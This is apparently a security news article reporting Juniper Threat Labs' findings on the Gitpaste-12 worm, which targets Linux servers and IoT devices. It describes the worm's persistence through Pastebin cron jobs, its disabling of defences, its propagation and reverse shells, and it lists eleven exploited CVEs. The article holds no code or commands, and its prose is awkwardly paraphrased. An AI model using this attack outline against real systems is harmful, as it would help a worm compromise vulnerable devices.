Recently, cybersecurity researchers have detected a new type of worm targeting Linux-based x86 servers and the Linux internet of things (IoT) devices. This new malware has been named Gitpaste-12, as it uses the GitHub, Pastebin, and other 12 ways that help it to compromise the system.
Juniper Threat Labs detected the first GitPaste-12 attacks on October 15, 2020; that’s why the cybersecurity researchers have reported both the Pastebin URL as well as the git repo. While here, the git repo was consummated on October 30, 2020.
This new worm can grow in an automatic manner that can begin to lateral spread within an association or to your hosts that are attempting to affect other networks all over the internet. And all this results in poor reliability for your organization.
In this malware, the first stage is related to the initial system that has been compromised. As Gitpaste-12 has 12 different known attack modules and more below development.
This worm always strive to use known exploits to negotiate the systems, and not only this, but it also attempts to brute force the passwords as well.
Once the malware is done with negotiating, it immediately sets up a cron job that it downloads from Pastebin, and later this job calls the same script and applies it again every minute. By doing this, all the updates regarding the cron job can easily be pushed to the botnet.
The malware starts up its cron job by setting the environment accordingly, which means it begins with stripping the system of its defenses, including firewall rules, SELinux, AppArmor, some common attack prevention, and monitoring software.
If we talk about the capability, then Gitpaste-12 malware includes a script that generally launches attacks toward other machines; its main motive is to replicate and spread thoroughly.
However, the Gitpaste-12 malware picks a random /8 CIDR for attack and then attempt all the addresses within that range.
Exploits of Gitpaste-12
Gitpaste-12 has some exploits that have been listed below:-
- CVE-2017-14135: Webadmin plugin for opendreambox
- CVE-2020-24217: HiSilicon based IPTV/H.264/H.265 video encoders
- CVE-2017-5638: Apache Struts
- CVE-2020-10987: Tenda router
- CVE-2014-8361: Miniigd SOAP service in Realtek SDK
- CVE-2020-15893: UPnP in Dlink routers
- CVE-2013-5948: Asus routers
- EDB-ID: 48225: Netlink GPON Router
- EDB-ID: 40500: AVTECH IP Camera
- CVE-2019-10758: Mongo db
- CVE-2017-17215: Huawei router
Many cybersecurity researchers have affirmed that worm malware are very annoying and troublesome. The worm malware is filled with several features and abilities; its main ability is to spread in an automated mode that can begin to lateral spread within an institution.
It can also spread to your hosts that have been trying to affect all other networks that are present on the internet; moreover, this worm provides the threat actors reverse shells.
And according to the security experts, there are some infected systems that are using TCP ports 30004 and 30005 open to listening for shell commands.